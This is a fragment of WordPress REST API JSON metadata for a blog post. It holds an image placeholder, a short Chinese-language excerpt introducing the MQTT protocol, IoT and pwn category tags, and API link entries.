src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-851\"  sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n","protected":false},"excerpt":{"rendered":"<p>MQTT\u8bb2\u89e3 MQTT\uff08Message Queuing Telemetry Transport\uff0c\u6d88\u606f\u961f\u5217\u9065\u6d4b\u4f20 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[36,12],"tags":[],"class_list":["post-768","post","type-post","status-publish","format-standard","hentry","category-iot","category-pwn"],"_links":{"self":[{"href":"http:\/\/39.104.51.85\/index.php\/wp-json\/wp\/v2\/posts\/768","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/39.104.51.85\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/39.104.51.85\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/39.104.51.85\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/39.104.51.85\/index.php\/wp-json\/wp\/v2\/comments?post=768"}],"version-history":[{"count":9,"href":"http:\/\/39.104.51.85\/index.php\/wp-json\/wp\/v2\/posts\/768\/revisions"}],"predecessor-version":[{"id":936,"href":"http:\/\/39.104.51.85\/index.php\/wp-json\/wp\/v2\/posts\/768\/revisions\/936"}],"wp:attachment":[{"href":"http:\/\/39.104.51.85\/index.php\/wp-json\/wp\/v2\/media?parent=768"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/39.104.51.85\/index.php\/wp-json\/wp\/v2\/categories?post=768"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/39.104.51.85\/index.php\/wp-json\/wp\/v2\/tags?post=768"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}